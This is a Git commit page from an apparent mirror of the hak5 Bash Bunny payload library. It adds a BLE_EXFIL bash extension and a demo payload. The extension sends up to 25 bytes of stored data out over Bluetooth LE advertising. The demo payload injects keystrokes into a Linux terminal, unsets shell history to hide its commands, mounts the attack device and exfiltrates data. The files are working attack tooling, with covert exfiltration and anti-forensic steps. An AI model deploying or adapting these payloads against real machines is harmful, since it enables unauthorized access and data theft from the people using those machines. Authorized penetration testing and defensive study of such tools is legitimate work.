hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploading BLE_EXFIL extension (#519) 

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter

* uploaded FileRipper

Faster executing version

* Update README.md

* fixing typo

* uploaded sudoSnatch

* Update README.md

* deleting sudoSnatch

* uploading payload

* Delete payload.sh

* Delete shell

* Delete systemBus

* Delete camPeek directory

* Update payload.sh

* Update payload.sh

* Delete payloads/library/execution/FileRipper directory

* Update payload.sh

* Update payload.sh

* Update payload.sh

* Update payload.sh

* uploading BLE_EXFIL extension

BLE_EXFIL extension, exfiltrates data via BLE

* BLE_EXFIL demo
pull/523/head
drapl0n 2022-05-03 03:17:53 +05:30 committed by GitHub
parent f12c486e12
commit b59823da1e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 63 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
payloads/extensions/ble_exfil.sh Normal file
View File

@ -0,0 +1,16 @@
#!/bin/bash
#
# BLE_EXFIL v1 by @drapl0n
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
# Usage: BLE_EXFIL
function BLE_EXFIL() {
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
text=$(cat /root/udisk/loot/ble_exfil.txt)
exfil=${text:0:25}
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
}
export -f BLE_EXFIL

47
payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt Normal file
View File

@ -0,0 +1,47 @@
# Description: Demonstration of BLE_EXFIL extension.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Advertising Data]
Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt
Q ENTER
BLE_EXFIL
Q DELAY 200
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH